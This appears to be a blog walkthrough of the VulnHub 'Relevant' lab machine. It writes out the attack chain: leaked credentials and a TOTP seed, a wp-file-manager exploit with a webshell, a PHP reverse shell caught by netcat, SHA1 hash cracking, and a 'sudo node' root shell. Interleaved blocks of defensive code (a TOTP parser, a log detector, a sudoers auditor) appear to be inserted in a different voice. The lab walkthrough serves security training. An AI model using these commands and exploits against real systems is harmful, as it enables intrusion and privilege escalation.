VulnHub Relevant Walkthrough – More WordPress Exploitation

The next machine that I solved was VulnHub Relevant, and it was another good one.

VulnHub Relevant Walkthrough – Introduction

If you haven’t read my last walkthrough, then I can recommend it.

This time, it’s Relevant by iamv1nc3nt, which you can download here.

VulnHub Relevant - Login prompt

YouTube Version of this Post

If you prefer video and audio over just reading the text, then you can find the YouTube version of this post below.

That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!

Enumeration

First, I did an Nmap sweep of my network to get my target’s IP address.

kali@kali:~/VulnHub/relevant$ sudo nmap -sP 192.168.5.0/24
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 19:03 EDT

...

Nmap scan report for cybersploit (192.168.5.230)
Host is up (0.00017s latency).
MAC Address: 08:00:27:15:FF:E0 (Oracle VirtualBox virtual NIC)

Next, I used Nmap again and saw that ports 22 and 80 were open on my target.

kali@kali:~/VulnHub/relevant$ sudo nmap -A 192.168.5.230
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 19:12 EDT
Nmap scan report for 192.168.5.230
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Database Error
MAC Address: 08:00:27:15:FF:E0 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/1%OT=22%CT=1%CU=31353%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F76625A%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=104%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.5.230

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds

For more web enumeration, I ran dirsearch against the host. I’m loving this tool and should have started using it instead of dirb a while ago.

kali@kali:~/VulnHub/relevant$ python3 ~/tools/dirsearch/dirsearch.py -u http://192.168.5.230 -e php,txt,cnf,conf -w /usr/share/wordlists/dirbuster/*medium*txt

_|. _ _  _  _  _ _|_    v0.3.9                                                                                   
(_||| _) (/_(_|| (_| )                                                                                            
                                                                                                                  
Extensions: php, txt, cnf, conf | HTTP method: GET | Threads: 12 | Wordlist size: 220521

Error Log: /home/kali/tools/dirsearch/logs/errors-20-10-01_19-16-53.log

Target: http://192.168.5.230                                                                                      
                                                                                                                  
Output File: /home/kali/tools/dirsearch/reports/192.168.5.230/20-10-01_19-16-53

[19:16:53] Starting:
[19:16:53] 500 -    3KB - /    
[19:16:54] 301 -  178B  - /wp-content  ->  http://192.168.5.230/wp-content/
[19:16:55] 301 -  178B  - /wp-includes  ->  http://192.168.5.230/wp-includes/
[19:17:13] 301 -  178B  - /wp-admin  ->  http://192.168.5.230/wp-admin/
                                                                                                      
Task Completed              

When I went to the home page of the web application, I saw a database connection error with a few links.

Database connection error

First, the imgbb link took me to a QR code.

QR code

When I decoded the QR code, I saw that it was an otpauth URI, i.e. a TOTP seed used for two-factor authentication.

otpauth://totp/patsy@relevant?secret=BTVB3SSDD4SZYUV7DXFPBCIFKY&issuer=relevant
Message #vulnhub
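To show what an otpauth URI like the one above actually carries, here is an added example (my own code, not from the original post or the box) that parses the URI and derives the six-digit TOTP code the same way an authenticator app does. It uses the RFC 4226/6238 test secret rather than the secret from the box, and the label "alice@example" is a constructed placeholder.

```python
import base64
import hashlib
import hmac
import struct
import time
from urllib.parse import parse_qs, unquote, urlparse


def parse_otpauth(uri):
    """Split an otpauth:// URI (Key URI format) into its parameters."""
    u = urlparse(uri)
    if u.scheme != "otpauth" or u.netloc not in ("totp", "hotp"):
        raise ValueError("not an otpauth totp/hotp URI")
    params = {k: v[0] for k, v in parse_qs(u.query).items()}
    return {
        "type": u.netloc,
        "label": unquote(u.path.lstrip("/")),   # e.g. "patsy@relevant"
        "issuer": params.get("issuer"),
        "secret": params["secret"],             # base32, usually without '=' padding
        "digits": int(params.get("digits", 6)),
        "period": int(params.get("period", 30)),
        "algorithm": params.get("algorithm", "SHA1").lower(),
    }


def hotp(secret_b32, counter, digits=6, algorithm="sha1"):
    """RFC 4226 HOTP: HMAC over the 8-byte big-endian counter, then dynamic truncation."""
    # Python's b32decode insists on padding; otpauth secrets usually omit it.
    secret_b32 = secret_b32.strip().upper()
    key = base64.b32decode(secret_b32 + "=" * (-len(secret_b32) % 8))
    digest = hmac.new(key, struct.pack(">Q", counter), getattr(hashlib, algorithm)).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret_b32, timestamp=None, digits=6, period=30, algorithm="sha1"):
    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / period)."""
    if timestamp is None:
        timestamp = time.time()
    return hotp(secret_b32, int(timestamp) // period, digits, algorithm)


def code_from_uri(uri, timestamp=None):
    """What an authenticator app computes after scanning the QR code."""
    p = parse_otpauth(uri)
    if p["type"] != "totp":
        raise ValueError("counter-based (hotp) URIs need a stored counter, not a timestamp")
    return totp(p["secret"], timestamp, p["digits"], p["period"], p["algorithm"])


# Constructed example URI using the RFC 4226/6238 test secret
# ("12345678901234567890" in base32), not the secret from the box.
EXAMPLE_URI = "otpauth://totp/alice@example?secret=GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ&issuer=example"

if __name__ == "__main__":
    print(parse_otpauth(EXAMPLE_URI))
    print("code at T=59:", code_from_uri(EXAMPLE_URI, 59))  # RFC 6238 vector: 287082
    print("current code:", code_from_uri(EXAMPLE_URI))
```

The point for a defender is that the secret in the URI is the whole second factor: anyone who can read the QR code (here, a public image) can generate valid codes indefinitely, so the seed must be treated with the same care as a password.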

Next, the Pastebin page had a list of usernames and passwords.

VulnHub Relevant - Pastebin credentials

I grabbed these credentials and put them into a local file. Once I got to the ‘patsy’ user, I received a prompt for a verification code.

kali@kali:~/VulnHub/relevant$ cat creds.txt
cardib : CardiCardiBacardi
cline : Hello^Dear^Kitten
edward : $cissor-Hands
kevin : Fish$Called-->
michael : abc123YouAndMe
patsy : Crazy%for%Falling
thriller : CuzThisIsThriller!
wanda : Franks&Beans&Mustard
willy : Wonka&TheChocolateFactory
webmaster : Google'sAllTheThings
kali@kali:~/VulnHub/relevant$ ssh <user>@192.168.5.230
Password:
Password:
kali@kali:~/VulnHub/relevant$ ssh <user>@192.168.5.230
Password:
Password:
kali@kali:~/VulnHub/relevant$ ssh <user>@192.168.5.230
Password:
Password:
kali@kali:~/VulnHub/relevant$ ssh <user>@192.168.5.230
Password:
Password:
kali@kali:~/VulnHub/relevant$ ssh patsy@192.168.5.230
Password:
Verification code:

Next, I added the TOTP secret from the otpauth URI to my Google Authenticator app, and I was able to log in successfully!

kali@kali:~/VulnHub/relevant$ ssh patsy@192.168.5.230
Password:
Verification code:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-48-generic x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

  System information as of Thu 01 Oct 2020 11:21:26 PM UTC

  System load:  0.16              Processes:               113
  Usage of /:   51.4% of 8.79GB   Users logged in:         0
  Memory usage: 30%               IPv4 address for enp0s3: 192.168.5.230
  Swap usage:   0%

* Kubernetes 1.19 is out! Get it in one command with:

     sudo snap install microk8s --channel=1.19 --classic

   https://microk8s.io/ has docs and details.

0 updates can be installed immediately.
0 of these updates are security updates.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep 21 19:10:51 2020 from 192.168.86.99
This account is currently not available.
Connection to 192.168.5.230 closed.

Initial Foothold

The ‘patsy’ account gave me no avenues for escalation (the SSH login was accepted but closed immediately with the message a nologin shell prints), so I went back to the web vector.

WordPress readme

First, I navigated around the WordPress site, but ran into some error pages.

WordPress error page

Next, I ran WPScan and found a few potentially interesting plugins.

kali@kali:~/VulnHub/relevant$ wpscan --url http://192.168.5.230 --force
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.5.230/ [192.168.5.230]
[+] Started: Thu Oct  1 19:28:18 2020

...

[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.5.230/wp-content/plugins/akismet/
| Latest Version: 4.1.6 (up to date)
| Last Updated: 2020-08-10T16:49:00.000Z
| Readme: http://192.168.5.230/wp-content/plugins/akismet/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
|  - http://192.168.5.230/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.6 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
|  - http://192.168.5.230/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
|  - http://192.168.5.230/wp-content/plugins/akismet/readme.txt

[+] wp-file-manager
| Location: http://192.168.5.230/wp-content/plugins/wp-file-manager/
| Last Updated: 2020-09-14T19:30:00.000Z
| Readme: http://192.168.5.230/wp-content/plugins/wp-file-manager/readme.txt
| [!] The version is out of date, the latest version is 6.9
|
| Found By: Known Locations (Aggressive Detection)
|  - http://192.168.5.230/wp-content/plugins/wp-file-manager/, status: 200
|
| Version: 6.7 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
|  - http://192.168.5.230/wp-content/plugins/wp-file-manager/readme.txt

When I visited the File Manager page, it looked like an older version of the wp-file-manager plugin.

VulnHub Relevant - File Manager

After some searching, I found a known vulnerability in this outdated version of the plugin, along with a public exploit for it.

Using the elFinder exploit, I got code execution as the www-data user!

kali@kali:~/VulnHub/relevant$ python elFinder.py http://192.168.5.230
Usage: elFinder.py http://localhost
URL Shell: %s/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=<CMD>
$ id
[binary PNG image data omitted: the response is an image with the command output appended]
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, I looked at the wp-config file, but the DB_PASSWORD was just a red herring.

<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'DidYouThinkItWouldBeThatEasy?TryHarder!' );

There were a few home directories on the system, including the previously compromised patsy user.

drwxr-xr-x  5 root     root     4096 Sep 21 19:50 .
drwxr-xr-x 20 root     root     4096 Sep 21 13:57 ..
drwxr-xr-x  4 h4x0r    h4x0r    4096 Sep 21 20:16 h4x0r
drwxr-xr-x  3 patsy    patsy    4096 Oct  1 23:21 patsy
drwxr-xr-x  3 relevant relevant 4096 Sep 21 20:27 relevant

Lateral Movement

With access to the www-data and patsy users, it was time to move to a user account that could escalate to root.

drwxr-xr-x 4 h4x0r h4x0r 4096 Sep 21 20:16 .
drwxr-xr-x 5 root  root  4096 Sep 21 19:50 ..
drwxr-xr-x 2 h4x0r h4x0r 4096 Sep 21 20:15 ...
lrwxrwxrwx 1 h4x0r h4x0r    9 Sep 21 20:16 .bash_history -> /dev/null
-rw-r--r-- 1 h4x0r h4x0r  220 Sep 21 19:50 .bash_logout
-rw-r--r-- 1 h4x0r h4x0r 3771 Sep 21 19:50 .bashrc
drwxrwxr-x 3 h4x0r h4x0r 4096 Sep 21 20:06 .local
-rw-r--r-- 1 h4x0r h4x0r  807 Sep 21 19:50 .profile

First, I found a note.txt file in a hidden ‘...’ directory inside h4x0r’s home, which contained a username and what looked like a hashed or encoded value.

$ cat /home/h4x0r/.../note.txt
[binary PNG image data omitted: the response is an image with the command output appended]
news : 4C7EB317A4F4322C325165B4217C436D6E0FA3F1

Using hashcat, I was able to crack this SHA1 hash in just over an hour. Note: If you are creating a vulnerable machine, I recommend just picking a password from the RockYou list, to prevent unnecessary cracking time.

kali@kali:~/VulnHub/relevant$ hashcat -m 100 relevant-hash.txt -r ~/tools/password_cracking_rules/OneRuleToRuleThemAll.rule ~/tools/cracking/rockyou.txt
hashcat (v5.1.0-1397-g7f4df9eb) starting...

OpenCL API (OpenCL 1.2 (Jun 23 2019 21:50:55)) - Platform #1 [Apple]
====================================================================
* Device #1: Intel(R) Core(TM) i9-9880H CPU @ 2.30GHz, skipped
* Device #2: Intel(R) UHD Graphics 630, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 560X Compute Engine, 1024/4096 MB allocatable, 16MCU

...

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Name........: SHA1
Hash.Target......: 4c7eb317a4f4322c325165b4217c436d6e0fa3f1
Time.Started.....: Sun Oct 11 13:00:27 2020 (18 mins, 56 secs)
Time.Estimated...: Sun Oct 11 14:34:09 2020 (1 hour, 14 mins)
Guess.Base.......: File (/Users/raymond.doyle/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/raymond.doyle/tools/password_cracking_rules/OneRuleToRuleThemAll.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 22439.1 kH/s (10.18ms) @ Accel:4 Loops:32 Thr:64 Vec:1
Speed.#3.........:   105.5 MH/s (21.12ms) @ Accel:32 Loops:64 Thr:64 Vec:1
Speed.#*.........:   128.0 MH/s
Recovered........: 0/1 (0.00%) Digests
Progress.........: 171704682496/745836298075 (23.02%)
Rejected.........: 0/171704682496 (0.00%)
Restore.Point....: 3276800/14344385 (22.84%)
Restore.Sub.#2...: Salt:0 Amplifier:22752-22784 Iteration:0-32
Restore.Sub.#3...: Salt:0 Amplifier:26496-26560 Iteration:0-64
Candidates.#2....: mektechmeier -> teamoiAlekitok
Candidates.#3....: te0ia209862 -> techm2009n77

4c7eb317a4f4322c325165b4217c436d6e0fa3f1:backdoorlover
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 4c7eb317a4f4322c325165b4217c436d6e0fa3f1
Time.Started.....: Sun Oct 11 13:00:27 2020 (1 hour, 8 mins)
Time.Estimated...: Sun Oct 11 14:08:34 2020 (0 secs)
Guess.Base.......: File (/Users/raymond.doyle/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/raymond.doyle/tools/password_cracking_rules/OneRuleToRuleThemAll.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 24557.0 kH/s (10.55ms) @ Accel:4 Loops:32 Thr:64 Vec:1
Speed.#3.........:   123.8 MH/s (14.49ms) @ Accel:32 Loops:64 Thr:64 Vec:1
Speed.#*.........:   148.3 MH/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 592495032320/745836298075 (79.44%)
Rejected.........: 0/592495032320 (0.00%)
Restore.Point....: 11374592/14344385 (79.30%)
Restore.Sub.#2...: Salt:0 Amplifier:8320-8352 Iteration:0-32
Restore.Sub.#3...: Salt:0 Amplifier:21376-21440 Iteration:0-64
Candidates.#2....: volcanoAugust102008 -> anonimoApRiL197630
Candidates.#3....: brat722map -> michellAugust112

Started: Sun Oct 11 13:00:26 2020
Stopped: Sun Oct 11 14:08:35 2020

Unfortunately, I was unable to switch to this ‘news’ user through the Python shell I was using: it runs one command per web request with no interactive terminal, so su could not prompt for a password.

That said, I found another blog post and exploit.

Using this new exploit, I was able to upload a PHP reverse shell to the host.

kali@kali:~/VulnHub/relevant$ cp reverse.php payload.php
kali@kali:~/VulnHub/relevant$ python3 2020-wp-file-manager-v67.py http://192.168.5.230
Just do it... URL: http://192.168.5.230/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
200
Success!?
http://192.168.5.230/../files/payload.php
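From the defender's side, both stages of this exploit leave a clear trace in the web server log: a POST to the plugin's elFinder connector (connector.minimal.php), followed by a request for a .php file under lib/files/. The following is an added example (my own detection logic, not code from the post or the plugin) that runs over a few constructed nginx access-log lines and flags that sequence per source IP; the log lines and IPs are made up for the example.

```python
import re
from collections import defaultdict

# Constructed nginx access-log lines (combined format). They mirror the request shapes
# discussed in this walkthrough but are not a real log from the box.
SAMPLE_LOG = """\
192.168.5.228 - - [01/Oct/2020:23:40:01 +0000] "GET / HTTP/1.1" 500 3011 "-" "Mozilla/5.0"
192.168.5.228 - - [01/Oct/2020:23:41:10 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 215 "-" "python-requests/2.24.0"
192.168.5.228 - - [01/Oct/2020:23:41:12 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/payload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Oct/2020:23:42:00 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 200 4096 "-" "WPScan v3.8.2"
10.0.0.9 - - [01/Oct/2020:23:43:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

PLUGIN = "/wp-content/plugins/wp-file-manager/"
CONNECTOR = PLUGIN + "lib/php/connector.minimal.php"  # elFinder connector; should not be reachable unauthenticated
FILES_DIR = PLUGIN + "lib/files/"                      # where uploads land; a .php file here means code execution


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["target"].split("?", 1)[0]  # drop the query string for matching
    rec["status"] = int(rec["status"])
    return rec


def detect(log_text):
    """Return findings for the two exploitation stages: connector POST, then PHP under lib/files/."""
    findings = []
    connector_posters = defaultdict(int)  # source IPs that have already hit the connector
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"] == CONNECTOR and rec["method"] == "POST":
            connector_posters[rec["ip"]] += 1
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "rule": "wp-file-manager-connector-post", "path": rec["target"]})
        elif rec["path"].startswith(FILES_DIR) and rec["path"].endswith(".php"):
            # Same IP that posted to the connector earlier: upload followed by execution.
            rule = "upload-then-execute" if connector_posters[rec["ip"]] else "php-under-lib-files"
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "rule": rule, "path": rec["target"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']:15}  {f['rule']:32}  {f['path']}")
```

A lone PHP request under lib/files/ is still reported (as "php-under-lib-files"), since the upload may have happened before the log window began; the same two paths are also good candidates for a web server deny rule while the plugin is being updated.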

After uploading this shell, I browsed to the file at the location the exploit printed, which triggered the payload on the target.

PHP reverse shell payload

On my attacker box, I caught this connection and had a much more useful shell!

kali@kali:~/VulnHub/relevant$ nc -lvp 4444
listening on [any] 4444 ...
192.168.5.230: inverse host lookup failed: Unknown host
connect to [192.168.5.228] from (UNKNOWN) [192.168.5.230] 40342
Linux relevant 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
23:48:39 up 30 min,  0 users,  load average: 0.00, 0.00, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

VulnHub Relevant – Privilege Escalation

First, using my new TTY, I switched to the ‘news’ user with the previously cracked password.

$ su - news
Password: backdoorlover
su: warning: cannot change directory to /var/spool/news: No such file or directory
id
uid=9(news) gid=9(news) groups=9(news)

Next, I checked my sudo privileges, and saw that I could run the /usr/bin/node command.

sudo -l -S
[sudo] password for news: backdoorlover
Matching Defaults entries for news on relevant:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User news may run the following commands on relevant:
    (ALL : ALL) /usr/bin/node
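A grant like the one above is easy to miss in a sudoers review, because /usr/bin/node looks like an ordinary program rather than a shell. As an added example (my own audit script, not part of the post or of sudo), here is a small checker that parses sudoers-style user specifications and flags rules that amount to a root shell: ALL, or a binary that can spawn a shell. The list of shell-capable binaries is an illustrative subset I chose, not a complete GTFOBins list, and the sample sudoers lines are constructed, with the first rule reproducing the grant shown on this box.

```python
import os
import re

# Commands that hand the caller a shell when run via sudo (interpreters, editors, pagers).
# Illustrative subset chosen for this example, not a complete GTFOBins list.
SHELL_CAPABLE = {
    "node", "python", "python2", "python3", "perl", "ruby", "php", "lua",
    "bash", "sh", "dash", "zsh", "vi", "vim", "nano", "less", "more", "awk", "find", "env",
}
TAG_RE = re.compile(r"\b(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV)\s*:\s*")
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")


def parse_rule(line):
    """Parse one sudoers user specification; returns None for comments, Defaults and blanks."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults"):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    commands, tags = [], []
    for spec in m.group("cmds").split(","):
        found = TAG_RE.findall(spec)
        if found:
            tags = found  # tags persist for the rest of the command list, as in sudoers(5)
        commands.append({"command": TAG_RE.sub("", spec).strip(), "tags": list(tags)})
    return {"user": m.group("user"), "host": m.group("host"),
            "runas": (m.group("runas") or "root").strip(), "commands": commands}


def audit(lines):
    """Flag rules that amount to an elevated shell: ALL, or a shell-capable binary."""
    findings = []
    for line in lines:
        rule = parse_rule(line)
        if rule is None:
            continue
        for c in rule["commands"]:
            cmd = c["command"]
            if cmd == "ALL":
                reason = "unrestricted command set"
            else:
                parts = cmd.split()
                binary = os.path.basename(parts[0])
                if binary not in SHELL_CAPABLE:
                    continue
                if len(parts) > 1:
                    # Fixed arguments limit the damage, but the script itself becomes the target.
                    reason = (f"{binary} with fixed arguments; verify {' '.join(parts[1:])} "
                              f"cannot be modified by {rule['user']}")
                else:
                    reason = f"{binary} can spawn a shell (see GTFOBins)"
            if "NOPASSWD" in c["tags"]:
                reason += ", no password required"
            findings.append({"user": rule["user"], "runas": rule["runas"],
                             "command": cmd, "reason": reason})
    return findings


# Constructed sudoers lines; the first rule reproduces the grant seen on this box.
SAMPLE_SUDOERS = [
    "# User privilege specification",
    "Defaults env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
    "news ALL=(ALL : ALL) /usr/bin/node",
    "deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx, /usr/bin/systemctl status nginx",
    "alice ALL=(ALL) NOPASSWD: ALL",
    "bob ALL=(root) /usr/bin/python3 /opt/backup.py",
]

if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f"{f['user']:8} -> ({f['runas']}) {f['command']}: {f['reason']}")
```

The checker reads the file format rather than the output of `sudo -l`, so run it against /etc/sudoers and the files under /etc/sudoers.d; the remediation for the first finding is the usual one: give the account a wrapper script with fixed arguments, or drop the grant entirely.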

I looked at the GTFOBins page to verify that I was familiar with the node privilege escalation.

With this command, I executed node, and obtained my root shell!

sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'

id   
uid=0(root) gid=0(root) groups=0(root)

Finally, I grabbed the flag file, and finished off the target.

Flag captured

VulnHub Relevant Walkthrough – Conclusion

This was a fun box and troubleshooting the WordPress exploit was an interesting challenge.

I know that there have been a ton of VulnHub posts recently, but I am still catching up on all my stream highlights.

In the meantime, let me know if there is any other content that you’d like to see, or just come on over and watch/follow/subscribe to the Twitch channel!

To catch me live, be sure to follow me on Twitch!
